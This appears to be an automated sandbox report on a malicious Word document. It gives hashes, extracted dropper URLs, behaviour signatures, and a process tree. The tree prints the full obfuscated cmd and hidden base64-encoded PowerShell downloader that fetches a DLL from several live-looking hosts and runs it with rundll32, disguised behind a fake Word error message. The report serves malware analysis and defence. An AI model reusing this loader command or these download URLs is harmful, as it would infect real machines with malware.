Analysis

  • max time kernel
    139s
  • max time network
    138s
  • platform
    windows10_x64
  • resource
    win10v20201028
  • submitted
    11-02-2021 19:37

General

  • Target

    f293fd0bb1eb18785e2d14275e58f164a0d62ad2b65115866121f4d9bf0482f0.doc

  • Size

    102KB

  • MD5

    fb4bedb321ff2b44db6f3a95aa870756

  • SHA1

    8d298b6c7231a8a3bc56d88cd83448de24f82af2

  • SHA256

    f293fd0bb1eb18785e2d14275e58f164a0d62ad2b65115866121f4d9bf0482f0

  • SHA512

    b8e5987b0a5d7104b817b504fe6ebf231ba6f2eb00eada291f284da56dfc6893a03ff07f8d3c15f7019f23b4810cc84a2d818039a6e49ca874ab7759f8f1049e

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://ordertaker.jakagroup.com/2f77k7i6/E/

exe.dropper

https://edge-tech.uk/flacon/61RO7/

exe.dropper

http://solicwebaps.azurewebsites.net/allam-cycle-1c4gn/KLBX/

exe.dropper

https://www.taradhuay.com/d/It4Iwlo/

exe.dropper

http://istanbulhaliyikamacim.com/content/I9Ogfopdi7/

exe.dropper

https://gmthearingsolution.com/cgi-bin/lrZkqL/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 5 IoCs
  • Loads dropped DLL 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 9 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\f293fd0bb1eb18785e2d14275e58f164a0d62ad2b65115866121f4d9bf0482f0.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:580
  • C:\Windows\system32\cmd.exe
    cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IAAkAE0AYwA3ACAAIAA9ACAAWwB0AHkAUABFAF0AKAAiAHsANAB9AHsAMAB9AHsAMgB9AHsAMQB9AHsANgB9AHsANQB9AHsAMwB9ACIALQBGACAAJwBTAFQAZQBNACcALAAnAGkAJwAsACcALgBJAE8ALgBkACcALAAnAHkAJwAsACcAUwB5ACcALAAnAEMAdABPAHIAJwAsACcAUgBFACcAKQAgADsAIAAgACQAbAA4AEoAbwAgACAAPQBbAFQAeQBwAGUAXQAoACIAewA2AH0AewA4AH0AewAwAH0AewA0AH0AewAyAH0AewA3AH0AewAxAH0AewAzAH0AewA1AH0AIgAtAEYAJwBFAG0AJwAsACcAZQBSAFYAaQBjAGUAcABvACcALAAnAEUAVAAuACcALAAnAGkATgB0AE0AQQBuAGEAJwAsACcALgBOACcALAAnAEcAZQByACcALAAnAFMAeQAnACwAJwBzACcALAAnAHMAdAAnACkAIAA7ACQAVwBtAGgAdgA2AHQAagA9ACQATAA1ADAAUgAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAWQA2ADIASAA7ACQATgA5ADMASgA9ACgAJwBEADcAJwArACcAMwBMACcAKQA7ACAAKABnAGUAVAAtAEMASABJAGwARABpAFQAZQBNACAAKAAiAHYAYQBSAGkAIgArACIAQQBCAEwARQA6ACIAKwAiAG0AIgArACIAYwA3ACIAKQAgACkALgB2AEEATAB1AEUAOgA6ACIAQwByAEUAYQBUAGUAZABJAGAAUgBgAGUAYABDAFQAbwBgAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAE8AUQAnACsAKAAnADcAUwAnACsAJwBwACcAKQArACgAJwBwAGYANwBwAHMATwBRACcAKwAnADcAJwApACsAJwBGACcAKwAnAG0AJwArACgAJwB2AF8AegAzAHQATwAnACsAJwBRADcAJwApACkALgAiAHIARQBQAEwAYABBAGMARQAiACgAKABbAGMASABBAHIAXQA3ADkAKwBbAGMASABBAHIAXQA4ADEAKwBbAGMASABBAHIAXQA1ADUAKQAsAFsAUwBUAHIASQBOAGcAXQBbAGMASABBAHIAXQA5ADIAKQApACkAOwAkAEUANAA2AEIAPQAoACcASAAnACsAKAAnADgAMAAnACsAJwBPACcAKQApADsAIAAkAGwAOABKAG8AOgA6ACIAcwBlAEMAdQByAEkAdABgAFkAcABgAFIAbwB0AE8AYwBPAEwAIgAgAD0AIAAoACcAVAAnACsAKAAnAGwAcwAxACcAKwAnADIAJwApACkAOwAkAEMAMQA5AEsAPQAoACcASwAnACsAKAAnADgANwAnACsAJwBJACcAKQApADsAJABNAHMAdQA3AGkAZgBvACAAPQAgACgAJwBZACcAKwAoACcANAAnACsAJwAwAE0AJwApACkAOwAkAFMAMQAwAFAAPQAoACgAJwBKACcAKwAnADUANAAnACkAKwAnAE4AJwApADsAJABRADcAMgBmAHEAdgByAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0AUwBwAHAAZgA3ACcAKwAnAHAAcwB7ADAAfQBGACcAKwAnAG0AdgBfAHoAMwB0AHsAMAAnACsAJwB9ACcAKQAgAC0ARgAgACAAWwBjAGgAQQByAF0AOQAyACkAKwAkAE0AcwB1ADcAaQBmAG8AKwAoACcALgBkACcAKwAnAGwAbAAnACkAOwAkAEQAXwA5AFMAPQAoACcASAAnACsAKAAnADcANwAnACsAJwBYACcAKQApADsAJABLADkANQBsAGcAMgA0AD0AKAAnAHMAZwAnACsAJwAgAHkAJwArACcAdwAnACsAKAAnACAAYQAnACsAJwBoACcAKQArACgAJwA6ACcAKwAnAC8ALwBvACcAKQArACgAJwByAGQAZQByACcAKwAnAHQAJwArACcAYQBrACcAKQArACcAZQAnACsAKAAnAHIALgBqACcAKwAnAGEAawBhAGcAcgAnACsAJwBvACcAKQArACcAdQBwACcAKwAoACcALgBjAG8AbQAnACsAJwAvACcAKQArACcAMgAnACsAKAAnAGYAJwArACcANwAnACsAJwA3AGsANwBpACcAKwAnADYALwBFAC8AQABzAGcAJwApACsAKAAnACAAJwArACcAeQAnACsAJwB3ACAAYQBoAHMAOgAnACkAKwAoACcALwAvACcAKwAnAGUAJwApACsAJwBkACcAKwAoACcAZwAnACsAJwBlAC0AdAAnACsAJwBlAGMAaAAuAHUAawAvACcAKQArACgAJwBmACcAKwAnAGwAYQBjACcAKQArACgAJwBvACcAKwAnAG4ALwAnACkAKwAnADYAJwArACcAMQAnACsAKAAnAFIAJwArACcATwA3AC8AJwApACsAKAAnAEAAcwAnACsAJwBnACAAJwApACsAJwB5AHcAJwArACcAIAAnACsAJwBhACcAKwAnAGgAOgAnACsAKAAnAC8AJwArACcALwBzAG8AJwApACsAJwBsACcAKwAoACcAaQBjACcAKwAnAHcAJwApACsAKAAnAGUAYgBhACcAKwAnAHAAJwApACsAJwBzAC4AJwArACcAYQB6ACcAKwAoACcAdQByAGUAdwAnACsAJwBlAGIAcwBpACcAKQArACcAdAAnACsAJwBlAHMAJwArACgAJwAuACcAKwAnAG4AZQB0AC8AJwApACsAKAAnAGEAbAAnACsAJwBsAGEAbQAnACsAJwAtAGMAJwApACsAKAAnAHkAYwBsAGUAJwArACcALQAnACkAKwAoACcAMQBjADQAZwAnACsAJwBuAC8AJwApACsAJwBLACcAKwAoACcATABCAFgAJwArACcALwBAAHMAZwAnACsAJwAgAHkAJwArACcAdwAgAGEAJwApACsAJwBoACcAKwAoACcAcwAnACsAJwA6AC8ALwB3ACcAKwAnAHcAJwArACcAdwAuAHQAYQAnACkAKwAoACcAcgAnACsAJwBhAGQAJwApACsAJwBoACcAKwAoACcAdQAnACsAJwBhAHkAJwApACsAKAAnAC4AYwAnACsAJwBvACcAKQArACgAJwBtAC8AZAAnACsAJwAvAEkAJwApACsAKAAnAHQANABJAHcAJwArACcAbABvACcAKQArACgAJwAvACcAKwAnAEAAcwBnACAAJwApACsAJwB5AHcAJwArACcAIABhACcAKwAoACcAaAAnACsAJwA6AC8AJwApACsAKAAnAC8AJwArACcAaQBzACcAKQArACgAJwB0AGEAbgBiACcAKwAnAHUAJwApACsAKAAnAGwAJwArACcAaABhACcAKQArACgAJwBsACcAKwAnAGkAeQBpAGsAJwApACsAJwBhACcAKwAoACcAbQBhAGMAJwArACcAaQBtAC4AJwArACcAYwBvAG0AJwArACcALwAnACkAKwAnAGMAbwAnACsAKAAnAG4AdABlACcAKwAnAG4AdAAvACcAKQArACgAJwBJACcAKwAnADkATwBnAGYAbwBwAGQAaQAnACsAJwA3ACcAKQArACgAJwAvACcAKwAnAEAAcwAnACsAJwBnACAAeQAnACkAKwAoACcAdwAgACcAKwAnAGEAaAAnACkAKwAoACcAcwAnACsAJwA6AC8AJwApACsAKAAnAC8AZwBtAHQAJwArACcAaAAnACsAJwBlACcAKQArACcAYQByACcAKwAoACcAaQBuAGcAcwAnACsAJwBvACcAKQArACcAbAAnACsAJwB1AHQAJwArACgAJwBpAG8AbgAnACsAJwAuAGMAJwApACsAJwBvAG0AJwArACgAJwAvACcAKwAnAGMAZwAnACkAKwAoACcAaQAnACsAJwAtACcAKwAnAGIAaQBuAC8AbAByACcAKQArACcAWgAnACsAKAAnAGsAcQAnACsAJwBMAC8AJwApACkALgAiAFIARQBgAHAAbABhAGMAZQAiACgAKAAoACcAcwBnACAAJwArACcAeQB3ACcAKQArACcAIABhACcAKwAnAGgAJwApACwAKABbAGEAcgByAGEAeQBdACgAKAAnAGQAcwAnACsAKAAnAGUAJwArACcAdwBmACcAKQApACwAKAAnAHcAZQAnACsAKAAnAHYAJwArACcAdwBlACcAKQApACkALAAoACgAJwBhAGUAJwArACcAZgAnACkAKwAnAGYAJwApACwAKAAnAGgAJwArACgAJwB0ACcAKwAnAHQAcAAnACkAKQApAFsAMgBdACkALgAiAHMAYABwAEwASQB0ACIAKAAkAEwAXwAwAEcAIAArACAAJABXAG0AaAB2ADYAdABqACAAKwAgACQATAAxADAAUgApADsAJABXADYAMQBEAD0AKAAoACcARgAnACsAJwA5ADQAJwApACsAJwBDACcAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQARwB6AGYAbwBmAHAAMAAgAGkAbgAgACQASwA5ADUAbABnADIANAApAHsAdAByAHkAewAoAC4AKAAnAE4AJwArACcAZQB3AC0ATwBiAGoAJwArACcAZQBjAHQAJwApACAAUwB5AHMAVABlAE0ALgBuAGUAVAAuAHcARQBCAEMAbABpAEUAbgBUACkALgAiAEQAbwB3AE4AbABgAE8AYABBAGQAYABGAGkATABFACIAKAAkAEcAegBmAG8AZgBwADAALAAgACQAUQA3ADIAZgBxAHYAcgApADsAJABRADkANABUAD0AKAAoACcATQAwACcAKwAnADAAJwApACsAJwBMACcAKQA7AEkAZgAgACgAKAAuACgAJwBHACcAKwAnAGUAJwArACcAdAAtAEkAdABlAG0AJwApACAAJABRADcAMgBmAHEAdgByACkALgAiAEwAYABlAE4AZwB0AEgAIgAgAC0AZwBlACAAMwA5ADYAMQAxACkAIAB7AC4AKAAnAHIAJwArACcAdQBuAGQAbABsADMAJwArACcAMgAnACkAIAAkAFEANwAyAGYAcQB2AHIALAAoACgAJwBBAG4AJwArACcAeQBTAHQAcgAnACkAKwAnAGkAJwArACcAbgBnACcAKQAuACIAVABvAGAAUwBgAFQAUgBJAE4AZwAiACgAKQA7ACQAVABfADMATAA9ACgAKAAnAEcAJwArACcANwAzACcAKQArACcAQQAnACkAOwBiAHIAZQBhAGsAOwAkAE8AOAA1AFUAPQAoACgAJwBYACcAKwAnADgANQAnACkAKwAnAFMAJwApAH0AfQBjAGEAdABjAGgAewB9AH0AJABIADUAMABRAD0AKAAnAFIAMQAnACsAJwAzAFcAJwApAA==
    1⤵
    • Process spawned unexpected child process
    • Suspicious use of WriteProcessMemory
    PID:2836
    • C:\Windows\system32\msg.exe
      msg Admin /v Word experienced an error trying to open the file.
      2⤵
        PID:204
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -w hidden -enc IAAkAE0AYwA3ACAAIAA9ACAAWwB0AHkAUABFAF0AKAAiAHsANAB9AHsAMAB9AHsAMgB9AHsAMQB9AHsANgB9AHsANQB9AHsAMwB9ACIALQBGACAAJwBTAFQAZQBNACcALAAnAGkAJwAsACcALgBJAE8ALgBkACcALAAnAHkAJwAsACcAUwB5ACcALAAnAEMAdABPAHIAJwAsACcAUgBFACcAKQAgADsAIAAgACQAbAA4AEoAbwAgACAAPQBbAFQAeQBwAGUAXQAoACIAewA2AH0AewA4AH0AewAwAH0AewA0AH0AewAyAH0AewA3AH0AewAxAH0AewAzAH0AewA1AH0AIgAtAEYAJwBFAG0AJwAsACcAZQBSAFYAaQBjAGUAcABvACcALAAnAEUAVAAuACcALAAnAGkATgB0AE0AQQBuAGEAJwAsACcALgBOACcALAAnAEcAZQByACcALAAnAFMAeQAnACwAJwBzACcALAAnAHMAdAAnACkAIAA7ACQAVwBtAGgAdgA2AHQAagA9ACQATAA1ADAAUgAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAWQA2ADIASAA7ACQATgA5ADMASgA9ACgAJwBEADcAJwArACcAMwBMACcAKQA7ACAAKABnAGUAVAAtAEMASABJAGwARABpAFQAZQBNACAAKAAiAHYAYQBSAGkAIgArACIAQQBCAEwARQA6ACIAKwAiAG0AIgArACIAYwA3ACIAKQAgACkALgB2AEEATAB1AEUAOgA6ACIAQwByAEUAYQBUAGUAZABJAGAAUgBgAGUAYABDAFQAbwBgAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAE8AUQAnACsAKAAnADcAUwAnACsAJwBwACcAKQArACgAJwBwAGYANwBwAHMATwBRACcAKwAnADcAJwApACsAJwBGACcAKwAnAG0AJwArACgAJwB2AF8AegAzAHQATwAnACsAJwBRADcAJwApACkALgAiAHIARQBQAEwAYABBAGMARQAiACgAKABbAGMASABBAHIAXQA3ADkAKwBbAGMASABBAHIAXQA4ADEAKwBbAGMASABBAHIAXQA1ADUAKQAsAFsAUwBUAHIASQBOAGcAXQBbAGMASABBAHIAXQA5ADIAKQApACkAOwAkAEUANAA2AEIAPQAoACcASAAnACsAKAAnADgAMAAnACsAJwBPACcAKQApADsAIAAkAGwAOABKAG8AOgA6ACIAcwBlAEMAdQByAEkAdABgAFkAcABgAFIAbwB0AE8AYwBPAEwAIgAgAD0AIAAoACcAVAAnACsAKAAnAGwAcwAxACcAKwAnADIAJwApACkAOwAkAEMAMQA5AEsAPQAoACcASwAnACsAKAAnADgANwAnACsAJwBJACcAKQApADsAJABNAHMAdQA3AGkAZgBvACAAPQAgACgAJwBZACcAKwAoACcANAAnACsAJwAwAE0AJwApACkAOwAkAFMAMQAwAFAAPQAoACgAJwBKACcAKwAnADUANAAnACkAKwAnAE4AJwApADsAJABRADcAMgBmAHEAdgByAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0AUwBwAHAAZgA3ACcAKwAnAHAAcwB7ADAAfQBGACcAKwAnAG0AdgBfAHoAMwB0AHsAMAAnACsAJwB9ACcAKQAgAC0ARgAgACAAWwBjAGgAQQByAF0AOQAyACkAKwAkAE0AcwB1ADcAaQBmAG8AKwAoACcALgBkACcAKwAnAGwAbAAnACkAOwAkAEQAXwA5AFMAPQAoACcASAAnACsAKAAnADcANwAnACsAJwBYACcAKQApADsAJABLADkANQBsAGcAMgA0AD0AKAAnAHMAZwAnACsAJwAgAHkAJwArACcAdwAnACsAKAAnACAAYQAnACsAJwBoACcAKQArACgAJwA6ACcAKwAnAC8ALwBvACcAKQArACgAJwByAGQAZQByACcAKwAnAHQAJwArACcAYQBrACcAKQArACcAZQAnACsAKAAnAHIALgBqACcAKwAnAGEAawBhAGcAcgAnACsAJwBvACcAKQArACcAdQBwACcAKwAoACcALgBjAG8AbQAnACsAJwAvACcAKQArACcAMgAnACsAKAAnAGYAJwArACcANwAnACsAJwA3AGsANwBpACcAKwAnADYALwBFAC8AQABzAGcAJwApACsAKAAnACAAJwArACcAeQAnACsAJwB3ACAAYQBoAHMAOgAnACkAKwAoACcALwAvACcAKwAnAGUAJwApACsAJwBkACcAKwAoACcAZwAnACsAJwBlAC0AdAAnACsAJwBlAGMAaAAuAHUAawAvACcAKQArACgAJwBmACcAKwAnAGwAYQBjACcAKQArACgAJwBvACcAKwAnAG4ALwAnACkAKwAnADYAJwArACcAMQAnACsAKAAnAFIAJwArACcATwA3AC8AJwApACsAKAAnAEAAcwAnACsAJwBnACAAJwApACsAJwB5AHcAJwArACcAIAAnACsAJwBhACcAKwAnAGgAOgAnACsAKAAnAC8AJwArACcALwBzAG8AJwApACsAJwBsACcAKwAoACcAaQBjACcAKwAnAHcAJwApACsAKAAnAGUAYgBhACcAKwAnAHAAJwApACsAJwBzAC4AJwArACcAYQB6ACcAKwAoACcAdQByAGUAdwAnACsAJwBlAGIAcwBpACcAKQArACcAdAAnACsAJwBlAHMAJwArACgAJwAuACcAKwAnAG4AZQB0AC8AJwApACsAKAAnAGEAbAAnACsAJwBsAGEAbQAnACsAJwAtAGMAJwApACsAKAAnAHkAYwBsAGUAJwArACcALQAnACkAKwAoACcAMQBjADQAZwAnACsAJwBuAC8AJwApACsAJwBLACcAKwAoACcATABCAFgAJwArACcALwBAAHMAZwAnACsAJwAgAHkAJwArACcAdwAgAGEAJwApACsAJwBoACcAKwAoACcAcwAnACsAJwA6AC8ALwB3ACcAKwAnAHcAJwArACcAdwAuAHQAYQAnACkAKwAoACcAcgAnACsAJwBhAGQAJwApACsAJwBoACcAKwAoACcAdQAnACsAJwBhAHkAJwApACsAKAAnAC4AYwAnACsAJwBvACcAKQArACgAJwBtAC8AZAAnACsAJwAvAEkAJwApACsAKAAnAHQANABJAHcAJwArACcAbABvACcAKQArACgAJwAvACcAKwAnAEAAcwBnACAAJwApACsAJwB5AHcAJwArACcAIABhACcAKwAoACcAaAAnACsAJwA6AC8AJwApACsAKAAnAC8AJwArACcAaQBzACcAKQArACgAJwB0AGEAbgBiACcAKwAnAHUAJwApACsAKAAnAGwAJwArACcAaABhACcAKQArACgAJwBsACcAKwAnAGkAeQBpAGsAJwApACsAJwBhACcAKwAoACcAbQBhAGMAJwArACcAaQBtAC4AJwArACcAYwBvAG0AJwArACcALwAnACkAKwAnAGMAbwAnACsAKAAnAG4AdABlACcAKwAnAG4AdAAvACcAKQArACgAJwBJACcAKwAnADkATwBnAGYAbwBwAGQAaQAnACsAJwA3ACcAKQArACgAJwAvACcAKwAnAEAAcwAnACsAJwBnACAAeQAnACkAKwAoACcAdwAgACcAKwAnAGEAaAAnACkAKwAoACcAcwAnACsAJwA6AC8AJwApACsAKAAnAC8AZwBtAHQAJwArACcAaAAnACsAJwBlACcAKQArACcAYQByACcAKwAoACcAaQBuAGcAcwAnACsAJwBvACcAKQArACcAbAAnACsAJwB1AHQAJwArACgAJwBpAG8AbgAnACsAJwAuAGMAJwApACsAJwBvAG0AJwArACgAJwAvACcAKwAnAGMAZwAnACkAKwAoACcAaQAnACsAJwAtACcAKwAnAGIAaQBuAC8AbAByACcAKQArACcAWgAnACsAKAAnAGsAcQAnACsAJwBMAC8AJwApACkALgAiAFIARQBgAHAAbABhAGMAZQAiACgAKAAoACcAcwBnACAAJwArACcAeQB3ACcAKQArACcAIABhACcAKwAnAGgAJwApACwAKABbAGEAcgByAGEAeQBdACgAKAAnAGQAcwAnACsAKAAnAGUAJwArACcAdwBmACcAKQApACwAKAAnAHcAZQAnACsAKAAnAHYAJwArACcAdwBlACcAKQApACkALAAoACgAJwBhAGUAJwArACcAZgAnACkAKwAnAGYAJwApACwAKAAnAGgAJwArACgAJwB0ACcAKwAnAHQAcAAnACkAKQApAFsAMgBdACkALgAiAHMAYABwAEwASQB0ACIAKAAkAEwAXwAwAEcAIAArACAAJABXAG0AaAB2ADYAdABqACAAKwAgACQATAAxADAAUgApADsAJABXADYAMQBEAD0AKAAoACcARgAnACsAJwA5ADQAJwApACsAJwBDACcAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQARwB6AGYAbwBmAHAAMAAgAGkAbgAgACQASwA5ADUAbABnADIANAApAHsAdAByAHkAewAoAC4AKAAnAE4AJwArACcAZQB3AC0ATwBiAGoAJwArACcAZQBjAHQAJwApACAAUwB5AHMAVABlAE0ALgBuAGUAVAAuAHcARQBCAEMAbABpAEUAbgBUACkALgAiAEQAbwB3AE4AbABgAE8AYABBAGQAYABGAGkATABFACIAKAAkAEcAegBmAG8AZgBwADAALAAgACQAUQA3ADIAZgBxAHYAcgApADsAJABRADkANABUAD0AKAAoACcATQAwACcAKwAnADAAJwApACsAJwBMACcAKQA7AEkAZgAgACgAKAAuACgAJwBHACcAKwAnAGUAJwArACcAdAAtAEkAdABlAG0AJwApACAAJABRADcAMgBmAHEAdgByACkALgAiAEwAYABlAE4AZwB0AEgAIgAgAC0AZwBlACAAMwA5ADYAMQAxACkAIAB7AC4AKAAnAHIAJwArACcAdQBuAGQAbABsADMAJwArACcAMgAnACkAIAAkAFEANwAyAGYAcQB2AHIALAAoACgAJwBBAG4AJwArACcAeQBTAHQAcgAnACkAKwAnAGkAJwArACcAbgBnACcAKQAuACIAVABvAGAAUwBgAFQAUgBJAE4AZwAiACgAKQA7ACQAVABfADMATAA9ACgAKAAnAEcAJwArACcANwAzACcAKQArACcAQQAnACkAOwBiAHIAZQBhAGsAOwAkAE8AOAA1AFUAPQAoACgAJwBYACcAKwAnADgANQAnACkAKwAnAFMAJwApAH0AfQBjAGEAdABjAGgAewB9AH0AJABIADUAMABRAD0AKAAnAFIAMQAnACsAJwAzAFcAJwApAA==
        2⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3832
        • C:\Windows\system32\rundll32.exe
          "C:\Windows\system32\rundll32.exe" C:\Users\Admin\Sppf7ps\Fmv_z3t\Y40M.dll,AnyString
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3812
          • C:\Windows\SysWOW64\rundll32.exe
            "C:\Windows\system32\rundll32.exe" C:\Users\Admin\Sppf7ps\Fmv_z3t\Y40M.dll,AnyString
            4⤵
            • Loads dropped DLL
            PID:2120

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Discovery

    Query Registry

    2
    T1012

    System Information Discovery

    2
    T1082

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\Sppf7ps\Fmv_z3t\Y40M.dll
      MD5

      6ad93a288d0f086d59441e800d2b0ffa

      SHA1

      7bef7f139b6658b0e401dd4faa9862b3ea938cb2

      SHA256

      d22f60827bc853750c3bdc533684c1c14eb5ef89e128cd8b89c4c12d25a6926d

      SHA512

      7eeb6e75daabf012f2c50e02becbd8081df3738f7a1aa205b36b3a5b7559013e2e1dbb934d2b3cbcbad80153cb00f47088caa3001b68fae6432d79e40514e2f9

    • \Users\Admin\Sppf7ps\Fmv_z3t\Y40M.dll
      MD5

      6ad93a288d0f086d59441e800d2b0ffa

      SHA1

      7bef7f139b6658b0e401dd4faa9862b3ea938cb2

      SHA256

      d22f60827bc853750c3bdc533684c1c14eb5ef89e128cd8b89c4c12d25a6926d

      SHA512

      7eeb6e75daabf012f2c50e02becbd8081df3738f7a1aa205b36b3a5b7559013e2e1dbb934d2b3cbcbad80153cb00f47088caa3001b68fae6432d79e40514e2f9

    • memory/204-7-0x0000000000000000-mapping.dmp
    • memory/580-3-0x00007FFD37CB0000-0x00007FFD37CC0000-memory.dmp
      Filesize

      64KB

    • memory/580-4-0x00007FFD37CB0000-0x00007FFD37CC0000-memory.dmp
      Filesize

      64KB

    • memory/580-5-0x00007FFD37CB0000-0x00007FFD37CC0000-memory.dmp
      Filesize

      64KB

    • memory/580-6-0x00007FFD5D8F0000-0x00007FFD5DF27000-memory.dmp
      Filesize

      6.2MB

    • memory/580-2-0x00007FFD37CB0000-0x00007FFD37CC0000-memory.dmp
      Filesize

      64KB

    • memory/2120-17-0x0000000000000000-mapping.dmp
    • memory/3812-15-0x0000000000000000-mapping.dmp
    • memory/3832-10-0x000002E854750000-0x000002E854752000-memory.dmp
      Filesize

      8KB

    • memory/3832-13-0x000002E8549E0000-0x000002E8549E1000-memory.dmp
      Filesize

      4KB

    • memory/3832-14-0x000002E854756000-0x000002E854758000-memory.dmp
      Filesize

      8KB

    • memory/3832-12-0x000002E854700000-0x000002E854701000-memory.dmp
      Filesize

      4KB

    • memory/3832-11-0x000002E854753000-0x000002E854755000-memory.dmp
      Filesize

      8KB

    • memory/3832-9-0x00007FFD50480000-0x00007FFD50E6C000-memory.dmp
      Filesize

      9.9MB

    • memory/3832-8-0x0000000000000000-mapping.dmp